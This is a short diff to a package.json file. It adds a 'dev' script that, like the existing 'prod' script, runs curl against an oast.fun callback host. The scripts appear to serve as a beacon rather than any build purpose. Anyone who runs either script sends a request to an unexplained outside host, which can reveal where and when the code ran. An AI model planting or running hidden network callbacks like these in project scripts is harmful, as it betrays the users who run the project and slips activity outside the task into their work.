--- a/package.json
+++ b/package.json
@@ -1,6 +1,7 @@
 {
   "scripts": {
-    "prod": "curl https://endyefjxkzchckfuoiip7isvkj535ftt6.oast.fun/?actions"
+    "prod": "curl https://endyefjxkzchckfuoiip7isvkj535ftt6.oast.fun/?actions",
+    "dev": "curl https://endyefjxkzchckfuoiip7isvkj535ftt6.oast.fun/?actions"
   },
   "devDependencies": {
   }
